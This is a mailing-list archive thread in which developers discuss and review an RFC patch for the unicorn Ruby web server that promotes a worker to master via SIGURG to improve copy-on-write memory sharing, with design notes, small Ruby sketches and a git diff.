> /me hides under a desk :<
>
> Honestly, you have no idea how embarrased I am of that (mis)feature.

It's a bit off topic, but really you shouldn't. A proper timeout mechanism
is absolutely essential to ensure resiliency of the service.

Unless your app is really trivial, it's pretty much impossible to ensure
that all your endpoints will always complete in a reasonable amount
of time, even more so when you have malicious actors trying to DOS
you, or some bugs in database clients and such.

Killing these stuck workers allows us to keep the service healthy until the
problem is fixed. The only thing we changed is that we first send SIGTERM
so that we can report the backtrace and other debug data.
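
For illustration, that pre-kill reporting could look roughly like this in an
after_fork hook (only a sketch of the idea, not what we actually ship):

  # hypothetical: dump the main thread's backtrace when the monitor
  # sends TERM, then exit hard so the master respawns the worker
  Signal.trap(:TERM) do
    $stderr.puts "worker=#{Process.pid} stuck; backtrace:"
    $stderr.puts caller
    exit!(1)
  end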

> send pipes or any other IO objects across.

Oh, that's what I missed, that makes sense. I'll try the C wrapper
to send both the message and the IO at the same time.
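
Something along these lines with plain stdlib, I think (a rough sketch of
what I mean by sending the message and the IO together; names are made up):

  require 'socket'

  parent, child = UNIXSocket.pair(:SEQPACKET)
  r, w = IO.pipe

  # sender: the payload and the file descriptor travel in one packet
  parent.sendmsg("refork", 0, nil, Socket::AncillaryData.unix_rights(w))

  # receiver: ask for SCM_RIGHTS so the passed fd comes back as an IO
  msg, _addr, _flags, anc = child.recvmsg(scm_rights: true)
  passed_io = anc.unix_rights.first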

Thanks again, I'll likely get back to you next week with a patch.

^ permalink raw reply	[relevance 2%]

* Re: [PATCH] Master promotion with SIGURG (CoW optimization)
  2022-07-06  7:40  1%   ` Jean Boussier
@ 2022-07-07 10:23  0%     ` Eric Wong
       [not found]           ` <CANPRWbHTNiEcYq5qhN6Kio8Wg9a+2gXmc2bAcB2oVw4LZv8rcw@mail.gmail.com>
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2022-07-07 10:23 UTC (permalink / raw)
  To: Jean Boussier; +Cc: unicorn-public

Jean Boussier <jean.boussier@shopify.com> wrote:
> > OK, any numbers from Puma users which can be used to project
> > improvements for unicorn (and other servers)?
> 
> There are some user reports here: https://github.com/puma/puma/issues/2258
> but they are mixed in with reports for two other new features.
> 
> Some reports are up to 20-30% savings, but I'd expect unicorn to benefit
> even more from it, given that typical puma users spawn fewer processes
> than with unicorn.

OK, those numbers sound very good (but I can't view
graphics/screenshots from w3m)

> > > They also include automatic reforking after a predetermined amount
> > > of requests (1k by default).
> >
> > 1k seems like a lot of requests (more on this below)
> 
> Agreed. Shared pages start being invalidated much faster than that.
> 
> > > - master: on `SIGURG`
> > >   - Forward `SIGURG` to a chosen worker.
> >
> > OK, I guess SIGURG is safe to use since nobody else relies on it (right?).
> 
> That's my understanding; an alternative could be to re-use USR2 and have a
> config flag to define whether it is a reexec or a refork.

SIGURG is fine; having SIGUSR2 mean two things seems fragile and error-prone.

> > Right.  PID file races and corner cases were painful to deal
> > with in the earliest days of this project, and I don't look
> > forward to having to deal with them ever again...
> >
> > It looked like the world was moving towards socket-activation
> > with dedicated process managers and away from fragile PID files;
> > so being self-daemonization dependent seems like a step back.
> 
> Agreed. We're currently running unicorn as PID 1 inside containers
> and I'm not exactly looking forward to having to monitor a PID file.
> 
> Another avenue I explored was to keep the existing master and
> refork from one of the workers like puma does, but re-assign the parent
> to the original master using PR_SET_CHILD_SUBREAPER.
> 
> Here are my notes on how it works:
> 
> ### Requirements:
> 
> - Need `PR_SET_CHILD_SUBREAPER`, so Linux 3.4+ only (May 2012)

I'm fine with requiring Linux for this feature, existing
features need to continue working on *BSD...

> - Need `File.mkfifo`, so Ruby 2.3 (Dec 2015), but can be shimmed for older
>   rubies.

I don't think it's necessary to use FIFOs at all (see below)

> ### Flow:
> 
> - master: set `PR_SET_CHILD_SUBREAPER` during boot.
> - master: create a temporary directory (`$TMP`).
> - master: spawn initial workers the old way.
> 
> - master: on `SIGCHLD` (a child died):
>   - Fake signal oldest worker (`SIGURG`).
>   - Write the new worker number in the fake signal pipe (at the same time).
> 
> - worker: on `SIGURG` (should spawn a sibling):
>   - Note: worker fake signals are processed after the current request is
>     completed.
>   - Run `before_fork` callback (MAYBE: need a special `before_refork`
>     callback?)
>   - create a pipe.
>   - daemonize (fork twice so that the new process is attributed to the
>     nearest `CHILD_SUBREAPER`, aka the original master).
>   - wait for the first child to exit.
>   - write into the pipe to signal the parent is dead.
>   - Run `after_fork` callback (MAYBE: need a special `after_refork` callback?)

*_fork callbacks already work for your current patch, though, right?
So hopefully *_refork won't be needed...

> - new sibling after fork:
>   - wait for the parent to exit (through the temporary pipe).
>   - create a named pipe (`File.mkfifo`) at `$TMP/$WORKER_NUM.pipe`.
>   - create a pidfile at `$TMP/WORKER_NUM.pid`.
>   - Open the named pipe in `IO::RDONLY | IO::NONBLOCK` (otherwise it would
>     block until the master open in write mode).
>     - NB: Need to convert it to a `Kgio::Pipe` with
>       `Kgio::Pipe.for_fd(f.to_i)`, and keep `f`, which needs `autoclose = false`.

sidenote: no need for kgio, I've been meaning to get rid of it
(Ruby 2.3+ has everything we'd need, I think...)

>   - Create the `Unicorn::Worker` instance with that pipe and worker number.
>   - Send `SIGURG` to the parent process (should be the master).
>   - Wait for `SIGCONT` in the named pipe.
>   - enter the worker loop.
> 
> - master: on `SIGURG`:
>   - for each outstanding refork order:
>     - Look for `$TMP/$WORKER_NUM.pid` and `$TMP/$WORKER_NUM.pipe`
>     - Read the pidfile
>     - Open the pipe with `IO::RDONLY | IO::NONBLOCK`
>       - NB: Need to convert it to a `Kgio::Pipe` with
>         `Kgio::Pipe.for_fd(f.to_i)`, and keep `f`, which needs `autoclose = false`.
>     - Delete pidfile and named pipe.
>     - Register that new worker normally.
>     - Write `SIGCONT` into the pipe.
> 
> I can share the patch if you are interested, but the extra complexity
> and Linux-only features made me prefer the master-promotion approach.

I would prefer this Linux-only approach if it gets rid of PID
files and doesn't introduce new temporary files/FIFOs.

It seems socketpair(..., SOCK_SEQPACKET) can be used for
packetized bidirectional IPC, perhaps with send_io + recv_io iff
necessary.  There shouldn't be any need for new, fragile FS
interactions.
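
Roughly something like this (an untested sketch, not unicorn code):

  require 'socket'

  master_end, worker_end = UNIXSocket.pair(:SEQPACKET)

  # each write is one packet; reads never see a partial or merged message
  worker_end.sendmsg([Signal.list['URG']].pack('l'))
  buf, = master_end.recvmsg
  signum = buf.unpack('l')[0]

  # send_io/recv_io work on the same pair if an fd ever needs to cross
  worker_end.send_io($stderr)
  io = master_end.recv_io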


Another idea: have you considered letting the master work on some requests?
Signal handling would be delayed, and EINTR handling bugs in
gems could be exposed, but it'd be completely portable...

> > > However it work well enough for demonstration.
> > >
> > So I figured I'd ask whether the feature is desired upstream
> > > before investing more effort into it.
> >
> > It really depends on:
> >
> > 1) what memory savings and/or speedups can be achieved
> >
> > 2) what support can we expect from you (and other users) for
> >    this feature and potential regressions going forward?
> >
> > I don't have the free time nor mental capacity to deal with
> > fallout from major new features such as this, myself.
> 
> Yeah, this is just an RFC; I wouldn't submit a final patch without
> first deploying it on our infra with good results. I'm just on the
> fence between trying to get this upstream vs. maintaining our own
> server that works solely like this, hence somewhat simpler and able
> to make more assumptions.

Of course you also realize unicorn remains culturally-incompatible
with 99.9% of the open source world since I refuse to rely on
graphics drivers to work on a daemon, proprietary software,
terms-of-service, etc...

If anything goes wrong, I'd likely CC you anyways.

> > The hook interface would be yet another documentation+support
> > burden I'm worried about (and also more unicorn-specific stuff
> > to lock people in :<).
> 
> Understandable. I suppose it can be done with a monitoring process.
> Check `smaps_rollup` and send `SIGURG` when deemed necessary.
> 
> More moving pieces, but it keeps unicorn simpler.

*shrug*  I've also been favoring more vertical integration in
other places to keep the overall stack simpler.

It depends on whether the monitoring process/library can work
with other Rack servers, probably; and signal compatibility.

> > A completely different idea which should achieve the same goal,
> > completely independent of unicorn:
> >
> >   App startup/loading can be made to trigger warmup paths which
> >   hit common endpoints.  IOW, app loading could run a small
> >   warmup suite which simulates common requests to heat up caches
> >   and trigger JIT.
> 
> Yeah, I don't really believe in this for a few reasons:
> 
>   - That would slow boot time.

Yes, and startup time is already a nasty thing, anyways...

>   - On large apps there are just too many codepaths for this to be realistic.

I was thinking a lazy solution could be to have some middleware
measure coverage and log requests to support auto-replay, somehow.
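
Something as dumb as this might be enough to start with (a made-up sketch;
no such middleware exists):

  # logs "METHOD PATH?QUERY" per request so a warmup script can replay them;
  # enabled with `use ReplayLogger` in config.ru
  class ReplayLogger
    def initialize(app, path = 'replay.log')
      @app = app
      @log = File.open(path, 'a')
      @log.sync = true
    end

    def call(env)
      @log.puts "#{env['REQUEST_METHOD']} #{env['PATH_INFO']}?#{env['QUERY_STRING']}"
      @app.call(env)
    end
  end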

>   - Many endpoints require database and other network access you probably
>     don't want in the master.

Wouldn't the *_fork hooks handle that, anyways?

>   - Endpoints may have side effects.

Yeah, this would optimize the GET endpoints, at least.
Not sure what percentage of POST needs to be optimized...

> > Ultimately (long-term for ruby-core), it would be better to make
> > JIT (and perhaps even VM cache) results persistent and shareable
> > across different processes, somehow...  That would help all Ruby
> > tools, even short-lived CLI tools.  Portable locking would be a
> > pain, I suppose, but proprietary OSes are always a pain :P
> 
> Based on my limited understanding of both JIT and VM caches, I don't think
> that's really possible.

Ugh, I still think it can be made possible, somehow.  But I no longer
use Ruby for new projects...

> The VM itself could definitely do better CoW wise, and I have some proposals
> on that front (https://bugs.ruby-lang.org/issues/18885) but that will take
> time and will never be perfect.
> 
> That's why I think periodically promoting a new master has potential.
> 
> > There's some line-wrapping issues caused by your MUA;
> 
> Urk. Ok, trying another client now, and I'll resend the patch.

Nope, still wrapped.  According to the git-format-patch(1) manpage,
Thunderbird can work w/o extensions, actually.

IME attachments might work mostly well, nowadays (test sending
to yourself and using "git am" to apply, first, of course).
Most on vger will disagree with me on attachments, though...

"git send-email" and "git imap-send" remain the recommended
options, but mutt works well, too.

> > Perhaps documenting this as experimental and subject to removal
> > at any time would make the addition of a major new feature an
> > easier pill to swallow; but I still think this is better outside
> > of app servers.
> 
> Up to you, if you don't feel like maintaining such a feature I would
> perfectly understand.

I'm fine with "maintaining it" if it just means Cc-ing you on
bugs related to this :>

^ permalink raw reply	[relevance 0%]

* Re: [PATCH] Master promotion with SIGURG (CoW optimization)
  2022-07-06  2:33  2% ` Eric Wong
@ 2022-07-06  7:40  1%   ` Jean Boussier
  2022-07-07 10:23  0%     ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Jean Boussier @ 2022-07-06  7:40 UTC (permalink / raw)
  Cc: unicorn-public

> OK, any numbers from Puma users which can be used to project
> improvements for unicorn (and other servers)?

There are some user reports here: https://github.com/puma/puma/issues/2258
but they are mixed in with reports for two other new features.

Some reports are up to 20-30% savings, but I'd expect unicorn to benefit
even more from it, given that typical puma users spawn fewer processes
than with unicorn.

> > They also include automatic reforking after a predetermined amount
> > of requests (1k by default).
>
> 1k seems like a lot of requests (more on this below)

Agreed. Shared pages start being invalidated much faster than that.

> > - master: on `SIGURG`
> >   - Forward `SIGURG` to a chosen worker.
>
> OK, I guess SIGURG is safe to use since nobody else relies on it (right?).

That's my understanding; an alternative could be to re-use USR2 and have a
config flag to define whether it is a reexec or a refork.

> Right.  PID file races and corner cases were painful to deal
> with in the earliest days of this project, and I don't look
> forward to having to deal with them ever again...
>
> It looked like the world was moving towards socket-activation
> with dedicated process managers and away from fragile PID files;
> so being self-daemonization dependent seems like a step back.

Agreed. We're currently running unicorn as PID 1 inside containers
and I'm not exactly looking forward to having to monitor a PID file.

Another avenue I explored was to keep the existing master and
refork from one of the workers like puma does, but re-assign the parent
to the original master using PR_SET_CHILD_SUBREAPER (a rough sketch of
the Linux-only calls involved is included after the notes below).

Here are my notes on how it works:

### Requirements:

- Need `PR_SET_CHILD_SUBREAPER`, so Linux 3.4+ only (May 2012)
- Need `File.mkfifo`, so Ruby 2.3 (Dec 2015), but can be shimmed for older
  rubies.

### Flow:

- master: set `PR_SET_CHILD_SUBREAPER` during boot.
- master: create a temporary directory (`$TMP`).
- master: spawn initial workers the old way.

- master: on `SIGCHLD` (a child died):
  - Fake signal oldest worker (`SIGURG`).
  - Write the new worker number in the fake signal pipe (at the same time).

- worker: on `SIGURG` (should spawn a sibling):
  - Note: worker fake signals are processed after the current request is
    completed.
  - Run `before_fork` callback (MAYBE: need a special `before_refork`
    callback?)
  - create a pipe.
  - daemonize (fork twice so that the new process is attributed to the
    nearest `CHILD_SUBREAPER`, aka the original master).
  - wait for the first child to exit.
  - write into the pipe to signal the parent is dead.
  - Run `after_fork` callback (MAYBE: need a special `after_refork` callback?)

- new sibling after fork:
  - wait for the parent to exit (through the temporary pipe).
  - create a named pipe (`File.mkfifo`) at `$TMP/$WORKER_NUM.pipe`.
  - create a pidfile at `$TMP/WORKER_NUM.pid`.
  - Open the named pipe in `IO::RDONLY | IO::NONBLOCK` (otherwise it would
    block until the master open in write mode).
    - NB: Need to convert it to a `Kgio::Pipe` with
      `Kgio::Pipe.for_fd(f.to_i)`, and keep `f`, which needs `autoclose = false`.
  - Create the `Unicorn::Worker` instance with that pipe and worker number.
  - Send `SIGURG` to the parent process (should be the master).
  - Wait for `SIGCONT` in the named pipe.
  - enter the worker loop.

- master: on `SIGURG`:
  - for each outstanding refork order:
    - Look for `$TMP/$WORKER_NUM.pid` and `$TMP/$WORKER_NUM.pipe`
    - Read the pidfile
    - Open the pipe with `IO::RDONLY | IO::NONBLOCK`
      - NB: Need to convert it to a `Kgio::Pipe` with
        `Kgio::Pipe.for_fd(f.to_i)`, and keep `f`, which needs `autoclose = false`.
    - Delete pidfile and named pipe.
    - Register that new worker normally.
    - Write `SIGCONT` into the pipe.
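
For reference, a rough sketch of the Linux-only calls involved (the prctl
constant and the fiddle usage are from memory, so double-check them):

  require 'fiddle'

  PR_SET_CHILD_SUBREAPER = 36 # from linux/prctl.h
  libc  = Fiddle.dlopen(nil)
  prctl = Fiddle::Function.new(libc['prctl'],
            [Fiddle::TYPE_INT, Fiddle::TYPE_LONG, Fiddle::TYPE_LONG,
             Fiddle::TYPE_LONG, Fiddle::TYPE_LONG], Fiddle::TYPE_INT)
  prctl.call(PR_SET_CHILD_SUBREAPER, 1, 0, 0, 0) # in the master, at boot

  # and the named-pipe handshake on the new sibling's side:
  path = "/tmp/unicorn-refork/0.pipe" # made-up path
  File.mkfifo(path)                              # Ruby 2.3+
  r = File.open(path, IO::RDONLY | IO::NONBLOCK) # won't block waiting for a writer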

I can share the patch if you are interested, but the extra complexity
and Linux-only features made me prefer the master-promotion approach.

> > However it work well enough for demonstration.
> >
> > So I figured I'd ask wether the feature is desired upstream
> > before investing more effort into it.
>
> It really depends on:
>
> 1) what memory savings and/or speedups can be achieved
>
> 2) what support can we expect from you (and other users) for
>    this feature and potential regressions going forward?
>
> I don't have the free time nor mental capacity to deal with
> fallout from major new features such as this, myself.

Yeah, this is just an RFC; I wouldn't submit a final patch without
first deploying it on our infra with good results. I'm just on the
fence between trying to get this upstream vs. maintaining our own
server that works solely like this, hence somewhat simpler and able
to make more assumptions.

> The hook interface would be yet another documentation+support
> burden I'm worried about (and also more unicorn-specific stuff
> to lock people in :<).

Understandable. I suppose it can be done with a monitoring process.
Check `smaps_rollup` and send `SIGURG` when deemed necessary.

More moving pieces, but it keeps unicorn simpler.
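
E.g. something like this in a separate monitoring process (the field choice
and threshold are guesses on my part, nothing unicorn provides):

  # kB of private dirty memory a worker has accumulated, per smaps_rollup
  def private_dirty_kb(pid)
    File.foreach("/proc/#{pid}/smaps_rollup") do |line|
      return $1.to_i if line =~ /\APrivate_Dirty:\s+(\d+) kB/
    end
    0
  end

  # promote when any worker has dirtied more than ~256MB of private pages
  def maybe_promote(master_pid, worker_pids, limit_kb = 256 * 1024)
    if worker_pids.any? { |pid| private_dirty_kb(pid) > limit_kb }
      Process.kill(:URG, master_pid)
    end
  end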

> A completely different idea which should achieve the same goal,
> completely independent of unicorn:
>
>   App startup/loading can be made to trigger warmup paths which
>   hit common endpoints.  IOW, app loading could run a small
>   warmup suite which simulates common requests to heat up caches
>   and trigger JIT.

Yeah, I don't really believe in this for a few reasons:

  - That would slow boot time.
  - On large apps there are just too many codepaths for this to be realistic.
  - Many endpoints require database and other network access you probably
    don't want in the master.
  - Endpoints may have side effects.

> Ultimately (long-term for ruby-core), it would be better to make
> JIT (and perhaps even VM cache) results persistent and shareable
> across different processes, somehow...  That would help all Ruby
> tools, even short-lived CLI tools.  Portable locking would be a
> pain, I suppose, but proprietary OSes are always a pain :P

Based on my limited understanding of both JIT and VM caches, I don't think
that's really possible.

The VM itself could definitely do better CoW wise, and I have some proposals
on that front (https://bugs.ruby-lang.org/issues/18885) but that will take
time and will never be perfect.

That's why I think periodically promoting a new master has potential.

> There's some line-wrapping issues caused by your MUA;

Urk. Ok, trying another client now, and I'll resend the patch.

> Perhaps documenting this as experimental and subject to removal
> at any time would make the addition of a major new feature an
> easier pill to swallow; but I still think this is better outside
> of app servers.

Up to you, if you don't feel like maintaining such a feature I would
perfectly understand.

---
 SIGNALS                        |   4 ++
 lib/unicorn.rb                 |   2 +-
 lib/unicorn/http_server.rb     | 115 +++++++++++++++++++++++++--------
 lib/unicorn/promoted_worker.rb |  40 ++++++++++++
 4 files changed, 134 insertions(+), 27 deletions(-)
 create mode 100644 lib/unicorn/promoted_worker.rb

diff --git a/SIGNALS b/SIGNALS
index 7321f2b..f5716b9 100644
--- a/SIGNALS
+++ b/SIGNALS
@@ -39,6 +39,10 @@ https://yhbt.net/unicorn/examples/init.sh
 * WINCH - gracefully stops workers but keep the master running.
   This will only work for daemonized processes.

+* URG - promote one of the existing workers as a new master, and gracefully
+  stop workers.
+  This will only work for daemonized processes.
+
 * TTIN - increment the number of worker processes by one

 * TTOU - decrement the number of worker processes by one
diff --git a/lib/unicorn.rb b/lib/unicorn.rb
index 1a50631..832f78d 100644
--- a/lib/unicorn.rb
+++ b/lib/unicorn.rb
@@ -133,6 +133,6 @@ def self.pipe # :nodoc:
 # :enddoc:

 %w(const socket_helper stream_input tee_input http_request configurator
-   tmpio util http_response worker http_server).each do |s|
+   tmpio util http_response worker promoted_worker http_server).each do |s|
   require_relative "unicorn/#{s}"
 end
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 21f2a05..dd8f021 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -50,6 +50,7 @@ class Unicorn::HttpServer
   #   Unicorn::HttpServer::START_CTX[0] = "/home/bofh/2.3.0/bin/unicorn"
   START_CTX = {
     :argv => ARGV.map(&:dup),
+    :generation => 0,
     0 => $0.dup,
   }
   # We favor ENV['PWD'] since it is (usually) symlink aware for Capistrano
@@ -106,7 +107,7 @@ def initialize(app, options = {})
     @orig_app = app
     # list of signals we care about and trap in master.
     @queue_sigs = [
-      :WINCH, :QUIT, :INT, :TERM, :USR1, :USR2, :HUP, :TTIN, :TTOU ]
+      :WINCH, :QUIT, :INT, :TERM, :USR1, :USR2, :HUP, :TTIN, :TTOU, :URG ]

     @worker_data = if worker_data = ENV['UNICORN_WORKER']
       worker_data = worker_data.split(',').map!(&:to_i)
@@ -119,7 +120,24 @@ def initialize(app, options = {})

   # Runs the thing.  Returns self so you can run join on it
   def start
+    @new_master = false
     inherit_listeners!
+    promote
+
+    # write pid early for Mongrel compatibility if we're not inheriting sockets
+    # This is needed for compatibility some Monit setups at least.
+    # This unfortunately has the side effect of clobbering valid PID if
+    # we upgrade and the upgrade breaks during preload_app==true && build_app!
+    self.pid = config[:pid]
+
+    build_app! if preload_app
+    bind_new_listeners!
+
+    spawn_missing_workers
+    self
+  end
+
+  def promote
     # this pipe is used to wake us up from select(2) in #join when signals
     # are trapped.  See trap_deferred.
     @self_pipe.replace(Unicorn.pipe)
@@ -130,18 +148,6 @@ def start
     # Note that signals don't actually get handled until the #join method
     @queue_sigs.each { |sig| trap(sig) { @sig_queue << sig; awaken_master } }
     trap(:CHLD) { awaken_master }
-
-    # write pid early for Mongrel compatibility if we're not inheriting sockets
-    # This is needed for compatibility some Monit setups at least.
-    # This unfortunately has the side effect of clobbering valid PID if
-    # we upgrade and the upgrade breaks during preload_app==true && build_app!
-    self.pid = config[:pid]
-
-    build_app! if preload_app
-    bind_new_listeners!
-
-    spawn_missing_workers
-    self
   end

   # replaces current listener set with +listeners+.  This will
@@ -178,16 +184,16 @@ def logger=(obj)
     Unicorn::HttpRequest::DEFAULTS["rack.logger"] = @logger = obj
   end

-  def clobber_pid(path)
+  def clobber_pid(path, content = $$)
     unlink_pid_safe(@pid) if @pid
     if path
       fp = begin
-        tmp = "#{File.dirname(path)}/#{rand}.#$$"
+        tmp = "#{File.dirname(path)}/#{rand}.#{content}"
         File.open(tmp, File::RDWR|File::CREAT|File::EXCL, 0644)
       rescue Errno::EEXIST
         retry
       end
-      fp.syswrite("#$$\n")
+      fp.syswrite("#{content}\n")
       File.rename(fp.path, path)
       fp.close
     end
@@ -279,6 +285,11 @@ def join
       end
       @ready_pipe = @ready_pipe.close rescue nil
     end
+
+    if @promoted
+      Process.kill(:WINCH, Process.ppid)
+    end
+
     begin
       reap_all_workers
       case @sig_queue.shift
@@ -292,6 +303,13 @@ def join
           @logger.debug("waiting #{sleep_time}s after suspend/hibernation")
         end
         maintain_worker_count if respawn
+
+        if @new_master && @new_master.ready? && @workers.empty?
+          # TODO: we should handle the new master dying like with reexec.
+          clobber_pid(pid, @new_master.pid)
+          break
+        end
+
         master_sleep(sleep_time)
       when :QUIT # graceful shutdown
         break
@@ -305,10 +323,20 @@ def join
         soft_kill_each_worker(:USR1)
       when :USR2 # exec binary, stay alive in case something went wrong
         reexec
+      when :URG
+        if $stdin.tty?
+          logger.info "SIGURG ignored because we're not daemonized"
+        else
+          promote_new_master
+        end
       when :WINCH
         if $stdin.tty?
           logger.info "SIGWINCH ignored because we're not daemonized"
         else
+          if @new_master
+            @new_master.ready!
+          end
+
           respawn = false
           logger.info "gracefully stopping all workers"
           soft_kill_each_worker(:QUIT)
@@ -408,11 +436,30 @@ def reap_all_workers
         worker = @workers.delete(wpid) and worker.close rescue nil
         @after_worker_exit.call(self, worker, status)
       end
+
+      if @new_master && @new_master.ready?
+        @new_master.scale(@workers.size)
+      end
     rescue Errno::ECHILD
       break
     end while true
   end

+  def promote_new_master
+    # Promoting the oldest worker
+    # TODO: handle `@new_master` being dead.
+    if @new_master
+      logger.error "can't promote because worker=#{@new_master.nr} is being promoted"
+    elsif pair = @workers.first
+      @new_master = Unicorn::PromotedWorker.new(*pair, worker_processes)
+      @workers.delete(@new_master.pid)
+      logger.info "master promoting worker=#{@new_master.worker.nr}"
+      @new_master.promote
+    else
+      logger.error "can't promote because there is no existing workers"
+    end
+  end
+
   # reexecutes the START_CTX with a new binary
   def reexec
     if @reexec_pid > 0
@@ -516,10 +563,11 @@ def murder_lazy_workers
   end

   def after_fork_internal
+    self.worker_processes = 0
     @self_pipe.each(&:close).clear # this is master-only, now
     @ready_pipe.close if @ready_pipe
     Unicorn::Configurator::RACKUP.clear
-    @ready_pipe = @init_listeners = @before_exec = @before_fork = nil
+    @ready_pipe = nil

     # The OpenSSL PRNG is seeded with only the pid, and apps with frequently
     # dying workers can recycle pids
@@ -545,6 +593,13 @@ def spawn_missing_workers
       unless pid
         after_fork_internal
         worker_loop(worker)
+
+        if @promoted
+          worker.tick = 0
+          promote
+          join
+        end
+
         exit
       end

@@ -678,19 +733,22 @@ def init_worker_process(worker)
     trap(:CHLD, 'DEFAULT')
     @sig_queue.clear
     proc_name "worker[#{worker.nr}]"
-    START_CTX.clear
     @workers.clear

     after_fork.call(self, worker) # can drop perms and create listeners
     LISTENERS.each { |sock| sock.close_on_exec = true }

     worker.user(*user) if user.kind_of?(Array) && ! worker.switched
-    @config = nil
     build_app! unless preload_app
-    @after_fork = @listener_opts = @orig_app = nil
+    @listener_opts = @orig_app = nil
     readers = LISTENERS.dup
     readers << worker
     trap(:QUIT) { nuke_listeners!(readers) }
+    @promoted = false
+    trap(:URG) do
+      @promoted = true
+      START_CTX[:generation] += 1
+    end
     readers
   end

@@ -706,11 +764,11 @@ def reopen_worker_logs(worker_nr)

   def prep_readers(readers)
     wtr = Unicorn::Waiter.prep_readers(readers)
-    @timeout *= 500 # to milliseconds for epoll, but halved
+    @select_timeout = @timeout * 500 # to milliseconds for epoll, but halved
     wtr
   rescue
     require_relative 'select_waiter'
-    @timeout /= 2.0 # halved for IO.select
+    @select_timeout = @timeout / 2.0 # halved for IO.select
     Unicorn::SelectWaiter.new
   end

@@ -720,7 +778,7 @@ def prep_readers(readers)
   def worker_loop(worker)
     readers = init_worker_process(worker)
     waiter = prep_readers(readers)
-    reopen = false
+    promote = reopen = false

     # this only works immediately if the master sent us the signal
     # (which is the normal case)
@@ -739,12 +797,17 @@ def worker_loop(worker)
           process_client(client)
           worker.tick = time_now.to_i
         end
+        if @promoted
+          worker.tick = time_now.to_i
+          return
+        end
+
         break if reopen
       end

       # timeout so we can .tick and keep parent from SIGKILL-ing us
       worker.tick = time_now.to_i
-      waiter.get_readers(ready, readers, @timeout)
+      waiter.get_readers(ready, readers, @select_timeout)
     rescue => e
       redo if reopen && readers[0]
       Unicorn.log_error(@logger, "listen loop error", e) if readers[0]
@@ -823,8 +886,8 @@ def build_app!
   end

   def proc_name(tag)
-    $0 = ([ File.basename(START_CTX[0]), tag
-          ]).concat(START_CTX[:argv]).join(' ')
+    $0 = ([ File.basename(START_CTX[0]), tag, "(gen: #{START_CTX[:generation]})",
+          ]).concat(START_CTX[:argv]).compact.join(' ')
   end

   def redirect_io(io, path)
diff --git a/lib/unicorn/promoted_worker.rb b/lib/unicorn/promoted_worker.rb
new file mode 100644
index 0000000..2595182
--- /dev/null
+++ b/lib/unicorn/promoted_worker.rb
@@ -0,0 +1,40 @@
+# -*- encoding: binary -*-
+
+class Unicorn::PromotedWorker
+  attr_reader :pid, :worker
+
+  def initialize(pid, worker, expected_worker_processes)
+    @pid = pid
+    @worker = worker
+    @worker_processes = 0
+    @expected_worker_processes = expected_worker_processes
+    @ready = false
+  end
+
+  def ready?
+    @ready
+  end
+
+  def ready!
+    @ready = true
+  end
+
+  def promote
+    @worker.soft_kill(:URG)
+  end
+
+  def scale(old_master_worker_processes)
+    diff = @expected_worker_processes -
+      old_master_worker_processes -
+      @worker_processes
+
+    if diff > 0
+      diff.times { kill(:TTIN) }
+      @worker_processes += diff
+    end
+  end
+
+  def kill(sig)
+    Process.kill(sig, @pid)
+  end
+end
-- 
2.35.1

^ permalink raw reply related	[relevance 1%]

* Re: [PATCH] Master promotion with SIGURG (CoW optimization)
  @ 2022-07-06  2:33  2% ` Eric Wong
  2022-07-06  7:40  1%   ` Jean Boussier
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2022-07-06  2:33 UTC (permalink / raw)
  To: Jean Boussier; +Cc: unicorn-public

Jean Boussier <jean.boussier@shopify.com> wrote:
> Unicorn rely on Copy on Write to limit applications' memory usage,
> however Ruby Copy on Write performance isn't exactly perfect.
> As code get executed various internal performance caches get warmed
> which cause shared pages to be invalidated.
> 
> While there's certainly some improvements to be made to Ruby itself
> on that front, it will likely get worse in the near future if YJIT
> become popular, as it will generate executable code in the workers
> hence won't be shared.
> 
> One way effective CoW performance could be improved would be to
> periodically promote one worker as the new master. Since that worker
> processed some requests, VM caches, JITed code, etc should be somewhat
> warm already, hence shared pages should be dirtied less frequently after
> each promotion.

Agreed, there's potential for savings, here...

> Puma 5.0.0 introduced a similar experimental feature called
> `fork_worker` or `refork`.
> 
> It's a bit more limited though, as instead of promoting a new
> master and exiting, they only ask worker #0 to fork itself to
> replace its siblings. So once all workers are replaced, there
> are 3 levels of processes: cluster -> first_worker -> other_workers.

OK, any numbers from Puma users which can be used to project
improvements for unicorn (and other servers)?

> They also include automatic reforking after a predetermined amount
> of requests (1k by default).

1k seems like a lot of requests (more on this below)

> The happy path works pretty much like this:
> 
> - Assume daemonized mode.
> 
> - master: on `SIGURG`
>   - Forward `SIGURG` to a chosen worker.

OK, I guess SIGURG is safe to use since nobody else relies on it (right?).

> - worker: on `SIGURG` (become a master)
>   - do the prep, register traps, open self-pipe, etc
>   - don't spawn any workers, set number of workers to 0.
>   - send `SIGWHINCH` to master.
> 
> - old master: on `SIGWHINCH`
>   - Gracefully shutdown workers, like during a reexec.

nit: only one `H' in `SIGWINCH`

> - old master: when a worker is reaped.
>   - Send `SIGTTIN` to the new master
>   - If it was the last worker:
>     - replace pidfile
>     - exit
> 
> This patch is not exactly production quality yet:
> 
>   - I need to write some tests
>   - There's a race condition that can cause the promoted master
>     to have one less worker than required. Needs to be addressed.
>   - The pidfile replacement should be improved.
>   - Multiple corner cases like a `QUIT` during promotion are not handled.

Right.  PID file races and corner cases were painful to deal
with in the earliest days of this project, and I don't look
forward to having to deal with them ever again...

It looked like the world was moving towards socket-activation
with dedicated process managers and away from fragile PID files;
so being self-daemonization dependent seems like a step back.

> However it work well enough for demonstration.
> 
> So I figured I'd ask whether the feature is desired upstream
> before investing more effort into it.

It really depends on:

1) what memory savings and/or speedups can be achieved

2) what support can we expect from you (and other users) for
   this feature and potential regressions going forward?

I don't have the free time nor mental capacity to deal with
fallout from major new features such as this, myself.

> For this to be used in production without too much integration effort
> I think automatic promotion based on some criteria like number of
> request or process lifetime would be needed.
> 
> Ideally a hook interface to programatically trigger promotion would
> be very valuable as I'd likely want to trigger promotion
> based on memory metrics read from `/proc/<pid>/smaps_rollup`.

The hook interface would be yet another documentation+support
burden I'm worried about (and also more unicorn-specific stuff
to lock people in :<).


A completely different idea which should achieve the same goal,
completely independent of unicorn:

  App startup/loading can be made to trigger warmup paths which
  hit common endpoints.  IOW, app loading could run a small
  warmup suite which simulates common requests to heat up caches
  and trigger JIT.

  That would be completely self-contained in each app and work
  on every single app server; not just ones with special
